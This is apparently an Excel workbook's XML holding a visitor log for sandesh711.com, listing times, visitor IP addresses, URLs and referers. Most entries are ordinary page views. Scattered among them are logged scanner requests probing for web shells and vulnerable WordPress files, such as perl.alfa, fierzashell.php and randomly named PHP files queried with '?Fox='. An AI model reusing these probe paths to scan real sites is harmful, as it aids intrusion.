  <c r="E6798" i="1" a="1"/>
  <c r="E6798" i="1"/>
  <c r="E6799" i="1" a="1"/>
  <c r="E6799" i="1"/>
  <c r="E6800" i="1" a="1"/>
  <c r="E6800" i="1" s="1"/>
  <c r="E6801" i="1" a="1"/>
  <c r="E6801" i="1" s="1"/>
  <c r="E6802" i="1" a="1"/>
  <c r="E6802" i="1"/>
  <c r="E6803" i="1" a="1"/>
  <c r="E6803" i="1"/>
  <c r="E6804" i="1" a="1"/>
  <c r="E6804" i="1" s="1"/>
  <c r="E6805" i="1" a="1"/>
  <c r="E6805" i="1" s="1"/>
  <c r="E6806" i="1" a="1"/>
  <c r="E6806" i="1"/>
  <c r="E6807" i="1" a="1"/>
  <c r="E6807" i="1"/>
  <c r="E6808" i="1" a="1"/>
  <c r="E6808" i="1" s="1"/>
  <c r="E6809" i="1" a="1"/>
  <c r="E6809" i="1" s="1"/>
  <c r="E6810" i="1" a="1"/>
  <c r="E6810" i="1"/>
  <c r="E6811" i="1" a="1"/>
  <c r="E6811" i="1"/>
  <c r="E6812" i="1" a="1"/>
  <c r="E6812" i="1" s="1"/>
  <c r="E6813" i="1" a="1"/>
  <c r="E6813" i="1" s="1"/>
  <c r="E6814" i="1" a="1"/>
  <c r="E6814" i="1"/>
  <c r="E6815" i="1" a="1"/>
  <c r="E6815" i="1"/>
  <c r="E6816" i="1" a="1"/>
  <c r="E6816" i="1" s="1"/>
  <c r="E6817" i="1" a="1"/>
  <c r="E6817" i="1" s="1"/>
  <c r="E6818" i="1" a="1"/>
  <c r="E6818" i="1"/>
  <c r="E6819" i="1" a="1"/>
  <c r="E6819" i="1"/>
  <c r="E6820" i="1" a="1"/>
  <c r="E6820" i="1" s="1"/>
  <c r="E6821" i="1" a="1"/>
  <c r="E6821" i="1" s="1"/>
  <c r="E6822" i="1" a="1"/>
  <c r="E6822" i="1"/>
  <c r="E6823" i="1" a="1"/>
  <c r="E6823" i="1"/>
  <c r="E6824" i="1" a="1"/>
  <c r="E6824" i="1" s="1"/>
  <c r="E6825" i="1" a="1"/>
  <c r="E6825" i="1" s="1"/>
  <c r="E6826" i="1" a="1"/>
  <c r="E6826" i="1"/>
  <c r="E6827" i="1" a="1"/>
  <c r="E6827" i="1"/>
  <c r="E6828" i="1" a="1"/>
  <c r="E6828" i="1" s="1"/>
  <c r="E6829" i="1" a="1"/>
  <c r="E6829" i="1" s="1"/>
  <c r="E6830" i="1" a="1"/>
  <c r="E6830" i="1"/>
  <c r="E6831" i="1" a="1"/>
  <c r="E6831" i="1"/>
  <c r="E6832" i="1" a="1"/>
  <c r="E6832" i="1" s="1"/>
  <c r="E6833" i="1" a="1"/>
  <c r="E6833" i="1" s="1"/>
  <c r="E6834" i="1" a="1"/>
  <c r="E6834" i="1"/>
  <c r="E6835" i="1" a="1"/>
  <c r="E6835" i="1"/>
  <c r="E6836" i="1" a="1"/>
  <c r="E6836" i="1" s="1"/>
  <c r="E6837" i="1" a="1"/>
  <c r="E6837" i="1" s="1"/>
  <c r="E6838" i="1" a="1"/>
  <c r="E6838" i="1"/>
  <c r="E6839" i="1" a="1"/>
  <c r="E6839" i="1"/>
  <c r="E6840" i="1" a="1"/>
  <c r="E6840" i="1" s="1"/>
  <c r="E6841" i="1" a="1"/>
  <c r="E6841" i="1" s="1"/>
  <c r="E6842" i="1" a="1"/>
  <c r="E6842" i="1"/>
  <c r="E6843" i="1" a="1"/>
  <c r="E6843" i="1"/>
  <c r="E6844" i="1" a="1"/>
  <c r="E6844" i="1" s="1"/>
  <c r="E6845" i="1" a="1"/>
  <c r="E6845" i="1" s="1"/>
  <c r="E6846" i="1" a="1"/>
  <c r="E6846" i="1"/>
  <c r="E6847" i="1" a="1"/>
  <c r="E6847" i="1"/>
  <c r="E6848" i="1" a="1"/>
  <c r="E6848" i="1" s="1"/>
  <c r="E6849" i="1" a="1"/>
  <c r="E6849" i="1" s="1"/>
  <c r="E6850" i="1" a="1"/>
  <c r="E6850" i="1"/>
  <c r="E6851" i="1" a="1"/>
  <c r="E6851" i="1"/>
  <c r="E6852" i="1" a="1"/>
  <c r="E6852" i="1" s="1"/>
  <c r="E6853" i="1" a="1"/>
  <c r="E6853" i="1" s="1"/>
  <c r="E6854" i="1" a="1"/>
  <c r="E6854" i="1"/>
  <c r="E6855" i="1" a="1"/>
  <c r="E6855" i="1"/>
  <c r="E6856" i="1" a="1"/>
  <c r="E6856" i="1" s="1"/>
  <c r="E6857" i="1" a="1"/>
  <c r="E6857" i="1" s="1"/>
  <c r="E6858" i="1" a="1"/>
  <c r="E6858" i="1"/>
  <c r="E6859" i="1" a="1"/>
  <c r="E6859" i="1"/>
  <c r="E6860" i="1" a="1"/>
  <c r="E6860" i="1" s="1"/>
  <c r="E6861" i="1" a="1"/>
  <c r="E6861" i="1" s="1"/>
  <c r="E6862" i="1" a="1"/>
  <c r="E6862" i="1"/>
  <c r="E6863" i="1" a="1"/>
  <c r="E6863" i="1"/>
  <c r="E6864" i="1" a="1"/>
  <c r="E6864" i="1" s="1"/>
  <c r="E6865" i="1" a="1"/>
  <c r="E6865" i="1" s="1"/>
  <c r="E6866" i="1" a="1"/>
  <c r="E6866" i="1"/>
  <c r="E6867" i="1" a="1"/>
  <c r="E6867" i="1"/>
  <c r="E6868" i="1" a="1"/>
  <c r="E6868" i="1" s="1"/>
  <c r="E6869" i="1" a="1"/>
  <c r="E6869" i="1" s="1"/>
  <c r="E6870" i="1" a="1"/>
  <c r="E6870" i="1"/>
  <c r="E6871" i="1" a="1"/>
  <c r="E6871" i="1"/>
  <c r="E6872" i="1" a="1"/>
  <c r="E6872" i="1" s="1"/>
  <c r="E6873" i="1" a="1"/>
  <c r="E6873" i="1" s="1"/>
  <c r="E6874" i="1" a="1"/>
  <c r="E6874" i="1"/>
  <c r="E6875" i="1" a="1"/>
  <c r="E6875" i="1"/>
  <c r="E6876" i="1" a="1"/>
  <c r="E6876" i="1" s="1"/>
  <c r="E6877" i="1" a="1"/>
  <c r="E6877" i="1" s="1"/>
  <c r="E6878" i="1" a="1"/>
  <c r="E6878" i="1"/>
  <c r="E6879" i="1" a="1"/>
  <c r="E6879" i="1"/>
  <c r="E6880" i="1" a="1"/>
  <c r="E6880" i="1" s="1"/>
  <c r="E6881" i="1" a="1"/>
  <c r="E6881" i="1" s="1"/>
  <c r="E6882" i="1" a="1"/>
  <c r="E6882" i="1"/>
  <c r="E6883" i="1" a="1"/>
  <c r="E6883" i="1"/>
  <c r="E6884" i="1" a="1"/>
  <c r="E6884" i="1" s="1"/>
  <c r="E6885" i="1" a="1"/>
  <c r="E6885" i="1" s="1"/>
  <c r="E6886" i="1" a="1"/>
  <c r="E6886" i="1"/>
  <c r="E6887" i="1" a="1"/>
  <c r="E6887" i="1"/>
  <c r="E6888" i="1" a="1"/>
  <c r="E6888" i="1" s="1"/>
  <c r="E6889" i="1" a="1"/>
  <c r="E6889" i="1" s="1"/>
  <c r="E6890" i="1" a="1"/>
  <c r="E6890" i="1"/>
  <c r="E6891" i="1" a="1"/>
  <c r="E6891" i="1"/>
  <c r="E6892" i="1" a="1"/>
  <c r="E6892" i="1" s="1"/>
  <c r="E6893" i="1" a="1"/>
  <c r="E6893" i="1" s="1"/>
  <c r="E6894" i="1" a="1"/>
  <c r="E6894" i="1"/>
  <c r="E6895" i="1" a="1"/>
  <c r="E6895" i="1"/>
  <c r="E6896" i="1" a="1"/>
  <c r="E6896" i="1" s="1"/>
  <c r="E6897" i="1" a="1"/>
  <c r="E6897" i="1" s="1"/>
  <c r="E6898" i="1" a="1"/>
  <c r="E6898" i="1"/>
  <c r="E6899" i="1" a="1"/>
  <c r="E6899" i="1"/>
  <c r="E6900" i="1" a="1"/>
  <c r="E6900" i="1" s="1"/>
  <c r="E6901" i="1" a="1"/>
  <c r="E6901" i="1" s="1"/>
  <c r="E6902" i="1" a="1"/>
  <c r="E6902" i="1"/>
  <c r="E6903" i="1" a="1"/>
  <c r="E6903" i="1"/>
  <c r="E6904" i="1" a="1"/>
  <c r="E6904" i="1" s="1"/>
  <c r="E6905" i="1" a="1"/>
  <c r="E6905" i="1" s="1"/>
  <c r="E6906" i="1" a="1"/>
  <c r="E6906" i="1"/>
  <c r="E6907" i="1" a="1"/>
  <c r="E6907" i="1"/>
  <c r="E6908" i="1" a="1"/>
  <c r="E6908" i="1" s="1"/>
  <c r="E6909" i="1" a="1"/>
  <c r="E6909" i="1" s="1"/>
  <c r="E6910" i="1" a="1"/>
  <c r="E6910" i="1"/>
  <c r="E6911" i="1" a="1"/>
  <c r="E6911" i="1"/>
  <c r="E6912" i="1" a="1"/>
  <c r="E6912" i="1" s="1"/>
  <c r="E6913" i="1" a="1"/>
  <c r="E6913" i="1" s="1"/>
  <c r="E6914" i="1" a="1"/>
  <c r="E6914" i="1"/>
  <c r="E6915" i="1" a="1"/>
  <c r="E6915" i="1"/>
  <c r="E6916" i="1" a="1"/>
  <c r="E6916" i="1" s="1"/>
  <c r="E6917" i="1" a="1"/>
  <c r="E6917" i="1" s="1"/>
  <c r="E6918" i="1" a="1"/>
  <c r="E6918" i="1"/>
  <c r="E6919" i="1" a="1"/>
  <c r="E6919" i="1"/>
  <c r="E6920" i="1" a="1"/>
  <c r="E6920" i="1" s="1"/>
  <c r="E6921" i="1" a="1"/>
  <c r="E6921" i="1" s="1"/>
  <c r="E6922" i="1" a="1"/>
  <c r="E6922" i="1"/>
  <c r="E6923" i="1" a="1"/>
  <c r="E6923" i="1"/>
  <c r="E6924" i="1" a="1"/>
  <c r="E6924" i="1" s="1"/>
  <c r="E6925" i="1" a="1"/>
  <c r="E6925" i="1" s="1"/>
  <c r="E6926" i="1" a="1"/>
  <c r="E6926" i="1"/>
  <c r="E6927" i="1" a="1"/>
  <c r="E6927" i="1"/>
  <c r="E6928" i="1" a="1"/>
  <c r="E6928" i="1" s="1"/>
  <c r="E5" i="1" a="1"/>
  <c r="E5" i="1" s="1"/>
  <c r="D5" i="1"/>
  <c r="D6" i="1"/>
  <c r="D7" i="1"/>
  <c r="D8" i="1"/>
  <c r="D9" i="1"/>
  <c r="C5" i="1"/>
  <c r="B5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11" i="1"/>
  <c r="D12" i="1"/>
  <c r="D13" i="1"/>
  <c r="D14" i="1"/>
  <c r="D15" i="1"/>
  <c r="D16" i="1"/>
  <c r="D17" i="1"/>
  <c r="D18" i="1"/>
  <c r="D1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6" i="1"/>
  <c r="C7" i="1"/>
  <c r="C8" i="1"/>
  <c r="C9" i="1"/>
  <c r="B6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49" i="1"/>
  <c r="B50" i="1"/>
  <c r="B51" i="1"/>
  <c r="B52" i="1"/>
  <c r="B53" i="1"/>
  <c r="B54" i="1"/>
  <c r="B55" i="1"/>
  <c r="B45" i="1"/>
  <c r="B46" i="1"/>
  <c r="B47" i="1"/>
  <c r="B48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26" i="1"/>
  <c r="B27" i="1"/>
  <c r="B28" i="1"/>
  <c r="B29" i="1"/>
  <c r="B25" i="1"/>
  <c r="B24" i="1"/>
  <c r="B20" i="1"/>
  <c r="B21" i="1"/>
  <c r="B22" i="1"/>
  <c r="B23" i="1"/>
  <c r="B13" i="1"/>
  <c r="B14" i="1"/>
  <c r="B15" i="1"/>
  <c r="B16" i="1"/>
  <c r="B17" i="1"/>
  <c r="B18" i="1"/>
  <c r="B19" i="1"/>
  <c r="B11" i="1"/>
  <c r="B12" i="1"/>
  <c r="B10" i="1"/>
  <c r="B7" i="1"/>
  <c r="B8" i="1"/>
  <c r="B9" i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4ABDA4-4E66-4849-B345-E140B526708C}" keepAlive="1" name="Query - visitors_indirect" description="Connection to the 'visitors_indirect' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=visitors_indirect;Extended Properties=&quot;&quot;" command="SELECT * FROM [visitors_indirec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6946" uniqueCount="3619">
  <si>
    <t>time</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>referer</t>
  </si>
  <si>
    <t>103.167.210.10</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/</t>
  </si>
  <si>
    <t>https://www.google.com/</t>
  </si>
  <si>
    <t>141.0.8.142</t>
  </si>
  <si>
    <t>106.66.204.34</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view_all.php?name=Veronica%20Perasso</t>
  </si>
  <si>
    <t>android-app://com.google.android.googlequicksearchbox/</t>
  </si>
  <si>
    <t>13.39.85.47</t>
  </si>
  <si>
    <t>https://sandesh711.com/ss.php</t>
  </si>
  <si>
    <t>www.google.com</t>
  </si>
  <si>
    <t>13.38.217.113</t>
  </si>
  <si>
    <t>13.38.118.58</t>
  </si>
  <si>
    <t>185.119.3.163</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/sofia-ansari/</t>
  </si>
  <si>
    <t>https://yandex.ru/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/category/indian-serial-actress/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/amp/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Dhivya%20Duraisamy&amp;date=2023-12-26</t>
  </si>
  <si>
    <t>https://sandesh711.com/view_all.php?name=Style%20With%20Plixxi</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewupdate.php</t>
  </si>
  <si>
    <t>106.210.149.195</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Vaibhavi%20Joshi%20777&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>https://sandesh711.com/leaderboard.php</t>
  </si>
  <si>
    <t>13.39.110.213</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/ss.php</t>
  </si>
  <si>
    <t>188.32.1.164</t>
  </si>
  <si>
    <t>35.180.46.27</t>
  </si>
  <si>
    <t>175.44.42.57</t>
  </si>
  <si>
    <t>http://www.feiacmr.shop/</t>
  </si>
  <si>
    <t>15.237.192.190</t>
  </si>
  <si>
    <t>118.179.63.4</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Aditi%20Mistry%202607&amp;date=2023-05-16</t>
  </si>
  <si>
    <t>https://lens.google.com/</t>
  </si>
  <si>
    <t>18.228.31.52</t>
  </si>
  <si>
    <t>13.38.66.239</t>
  </si>
  <si>
    <t>13.36.174.70</t>
  </si>
  <si>
    <t>82.180.145.186</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/seotheme/db.php?u</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yoohslwv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://sandesh711.com/wp-plain.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yosurgpt.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://sandesh711.com/alfacgiapi/perl.alfa</t>
  </si>
  <si>
    <t>https://sandesh711.com/ALFA_DATA/alfacgiapi/perl.alfa</t>
  </si>
  <si>
    <t>157.49.105.240</t>
  </si>
  <si>
    <t>https://sandesh711.com/viewup.php?name=Neha%20Saha&amp;date=2023-09-16</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/pjwfyqlf.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>197.121.109.113</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Rimpi%2031&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>3.110.102.40</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-term.php</t>
  </si>
  <si>
    <t>https://www.google.com</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-ver.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-ver.php</t>
  </si>
  <si>
    <t>184.72.73.122</t>
  </si>
  <si>
    <t>https://sandesh711.com/view_all.php</t>
  </si>
  <si>
    <t>http://www.google.com/</t>
  </si>
  <si>
    <t>205.210.31.20</t>
  </si>
  <si>
    <t>http://68.178.148.82:80/</t>
  </si>
  <si>
    <t>35.212.115.150</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/rasha-kirmani-a-rising-star-in-the-world-of-dance-and-expression/</t>
  </si>
  <si>
    <t>31.13.224.152</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wxxlsett.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>205.169.39.14</t>
  </si>
  <si>
    <t>https://bing.com/</t>
  </si>
  <si>
    <t>216.52.89.85</t>
  </si>
  <si>
    <t>http://www.google.com</t>
  </si>
  <si>
    <t>54.164.248.153</t>
  </si>
  <si>
    <t>52.91.105.230</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hindi-serial-actress/actors-and-actresses-who-rose-to-stardom-via-ott-platforms/</t>
  </si>
  <si>
    <t>98.83.119.52</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/trending-saree-fashion-on-instagram/</t>
  </si>
  <si>
    <t>54.87.14.29</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/body-positivity/</t>
  </si>
  <si>
    <t>99.235.88.107</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Ruhi%20Singh%2012</t>
  </si>
  <si>
    <t>35.86.207.164</t>
  </si>
  <si>
    <t>35.86.230.175</t>
  </si>
  <si>
    <t>34.211.231.217</t>
  </si>
  <si>
    <t>54.200.146.196</t>
  </si>
  <si>
    <t>175.44.42.95</t>
  </si>
  <si>
    <t>http://www.urbanchr.online/</t>
  </si>
  <si>
    <t>157.50.47.98</t>
  </si>
  <si>
    <t>https://sandesh711.com/view_all.php?name=Sureet%20Kular</t>
  </si>
  <si>
    <t>87.120.115.3</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/rss-feed-post-generator-echo/readme.txt</t>
  </si>
  <si>
    <t>198.235.24.130</t>
  </si>
  <si>
    <t>51.15.16.101</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/wp-pridmag/up.php</t>
  </si>
  <si>
    <t>197.35.102.155</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Malavika%20Mohanan&amp;date=2023-11-14</t>
  </si>
  <si>
    <t>177.247.97.36</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Eva%20Lovia</t>
  </si>
  <si>
    <t>54.85.144.6</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php</t>
  </si>
  <si>
    <t>103.218.237.245</t>
  </si>
  <si>
    <t>27.97.221.32</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Bhumi%20Pednekar%20&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>193.186.4.185</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1%E0%B2%A6%E0%B2%B2%E0%B3%8D%E0%B2%B2%E0%B2%BF-%E0%B2%85%E0%B2%B5%E0%B2%95%E0%B2%BE%E0%B2%B6-%E0%B2%B5%E0%B2%82%E0%B2%9A%E0%B2%BF%E0%B2%A4-%E0%B2%AA/</t>
  </si>
  <si>
    <t>18.171.156.21</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/sruthy-renjith-vaiga/</t>
  </si>
  <si>
    <t>https://duckduckgo.com/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/themes.php</t>
  </si>
  <si>
    <t>35.87.94.209</t>
  </si>
  <si>
    <t>https://sandesh711.com/?v=1</t>
  </si>
  <si>
    <t>39.53.205.69</t>
  </si>
  <si>
    <t>198.235.24.145</t>
  </si>
  <si>
    <t>54.82.162.184</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/embracing-diversity-the-rise-of-plus-size-models-on-instagram/</t>
  </si>
  <si>
    <t>71.142.246.0</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Samyuktha%20Menon</t>
  </si>
  <si>
    <t>49.195.0.172</t>
  </si>
  <si>
    <t>175.44.42.58</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/leonilla-shwetha-dsouza-looks-to-be-a-promising-actress/</t>
  </si>
  <si>
    <t>38.242.206.95</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/jaida/lang.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/travel/issue.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-help/mini.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/fix/up.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/shell/about.php</t>
  </si>
  <si>
    <t>152.58.240.161</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-essay/%E0%B2%A7%E0%B2%B0%E0%B3%86%E0%B2%AF-%E0%B2%A8%E0%B2%97%E0%B3%81/</t>
  </si>
  <si>
    <t>54.226.92.27</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/top-telugu-tv-anchors-of-present-time-who-captivate-audiences-with-their-charisma-and-energy/</t>
  </si>
  <si>
    <t>91.92.241.189</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/jupiterx-core/readme.txt</t>
  </si>
  <si>
    <t>168.235.206.163</t>
  </si>
  <si>
    <t>49.37.113.211</t>
  </si>
  <si>
    <t>https://www.google.co.in/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/charitable/readme.txt</t>
  </si>
  <si>
    <t>45.61.185.37</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/?author=3</t>
  </si>
  <si>
    <t>http://www.google.com.hk</t>
  </si>
  <si>
    <t>91.92.255.187</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ayofjrkm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/txdszrvc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>94.156.68.159</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/mgpajkel.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kkuzggjv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>171.51.139.193</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/learnpress/readme.txt</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/privacy-policy/</t>
  </si>
  <si>
    <t>74.119.193.150</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/stylewithplixxi/</t>
  </si>
  <si>
    <t>103.156.26.181</t>
  </si>
  <si>
    <t>205.210.31.51</t>
  </si>
  <si>
    <t>18.116.62.121</t>
  </si>
  <si>
    <t>54.158.116.226</t>
  </si>
  <si>
    <t>54.175.136.46</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/%E0%B2%B0%E0%B2%AE%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%AA%E0%B2%B8%E0%B3%81%E0%B2%AA%E0%B3%81%E0%B2%B2%E0%B3%87%E0%B2%9F%E0%B2%BF-%E0%B2%85%E0%B2%B5%E0%B2%B0-%E0%B2%A6%E0%B3%8A%E0%B2%A1%E0%B3%8D/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/science/charles-herbert-best/</t>
  </si>
  <si>
    <t>4.213.167.133</t>
  </si>
  <si>
    <t>175.44.42.218</t>
  </si>
  <si>
    <t>54.198.120.203</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/sharwari-gujar-and-archana-gujar-the-dynamic-fitness-enthusiast-mom-and-daughter-duo/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/freedom-fighters/freedom-fighter-sanjeevnath-aikala/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/lakshmi-rai/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/ashlesha-savant/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/prajakta/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/roma-varadkar/</t>
  </si>
  <si>
    <t>216.52.89.119</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/category/kannada-serial-actress/</t>
  </si>
  <si>
    <t>98.81.132.159</t>
  </si>
  <si>
    <t>144.126.128.225</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-catcher/</t>
  </si>
  <si>
    <t>91.92.242.21</t>
  </si>
  <si>
    <t>54.81.2.33</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/wp-catcher/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/swetha-changappa/</t>
  </si>
  <si>
    <t>216.52.89.113</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/style-with-plixxi/</t>
  </si>
  <si>
    <t>54.198.156.179</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/chandini-tamilarasan/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/inaya-sultana/</t>
  </si>
  <si>
    <t>75.101.175.63</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/crypto/what-is-bitcoin/</t>
  </si>
  <si>
    <t>3.80.118.12</t>
  </si>
  <si>
    <t>216.52.89.84</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/wamiqa-gabbi/</t>
  </si>
  <si>
    <t>18.212.221.148</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/madhuri-braganza/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/1920-bollywood-movie/</t>
  </si>
  <si>
    <t>34.229.230.184</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/mukesh-gahlot/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/mukhota-dance/</t>
  </si>
  <si>
    <t>216.52.89.114</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/incredible-india/different-dance-forms-in-india/</t>
  </si>
  <si>
    <t>216.52.89.111</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/famous-splitsvilla-contenstants/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/anasuya-bharadwaj/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/kannada-actresses-who-did-not-get-many-opportunities-in-kannada-films-but-gained-fame-and-success-in-other-languages/</t>
  </si>
  <si>
    <t>216.52.89.115</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/rashi-modi/</t>
  </si>
  <si>
    <t>98.82.203.13</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/why-did-adah-sharma-not-get-many-chances-in-bollywood/</t>
  </si>
  <si>
    <t>18.234.215.77</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/bigg-boss-8-kannada/</t>
  </si>
  <si>
    <t>1.92.153.111</t>
  </si>
  <si>
    <t>https://www.baidu.com</t>
  </si>
  <si>
    <t>120.46.90.142</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bmicsxty.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/zmcwzcnl.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>198.235.24.30</t>
  </si>
  <si>
    <t>35.94.244.91</t>
  </si>
  <si>
    <t>128.199.74.42</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wordpress/wp-admin/setup-config.php?step=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/old/wp-admin/setup-config.php?step=1</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/sucheta-dutta/</t>
  </si>
  <si>
    <t>157.48.168.192</t>
  </si>
  <si>
    <t>152.59.37.231</t>
  </si>
  <si>
    <t>152.58.134.142</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Shubha%20Poonja</t>
  </si>
  <si>
    <t>144.126.135.200</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/simple/simple.php</t>
  </si>
  <si>
    <t>177.247.96.252</t>
  </si>
  <si>
    <t>103.195.74.151</t>
  </si>
  <si>
    <t>51.75.74.204</t>
  </si>
  <si>
    <t>35.87.106.142</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/ulidavaru-kandante/</t>
  </si>
  <si>
    <t>198.235.24.141</t>
  </si>
  <si>
    <t>175.44.42.250</t>
  </si>
  <si>
    <t>http://www.freetraffic.shop/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/rakulpreet-singh/</t>
  </si>
  <si>
    <t>34.227.150.184</t>
  </si>
  <si>
    <t>99.105.215.242</t>
  </si>
  <si>
    <t>164.90.206.49</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/style.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/b0.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/pki-validation/x.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/fierzashell.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/tag/vainidhi-jagdish/</t>
  </si>
  <si>
    <t>44.203.35.250</t>
  </si>
  <si>
    <t>34.228.21.200</t>
  </si>
  <si>
    <t>216.52.89.112</t>
  </si>
  <si>
    <t>52.90.30.75</t>
  </si>
  <si>
    <t>3.83.38.182</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/simple/simple.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/category/hindi-serial-actress/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/body-positivity-influencers-who-are-redefining-beauty-standards/</t>
  </si>
  <si>
    <t>18.232.97.73</t>
  </si>
  <si>
    <t>18.212.129.87</t>
  </si>
  <si>
